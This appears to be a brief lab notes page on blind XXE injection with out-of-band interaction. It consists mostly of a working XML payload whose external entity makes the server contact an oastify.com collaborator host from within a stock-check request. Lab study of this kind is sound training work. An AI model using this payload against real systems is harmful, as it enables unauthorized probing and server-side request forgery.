Blind XXE with out-of-band interaction
PreviousExploiting XXE to perform SSRF attacksNextBlind XXE with out-of-band interaction via XML parameter entities
Last updated
Last updated
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://tgd18wllnshtjl7z3einaj853w9nxel3.oastify.com"> ]>
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>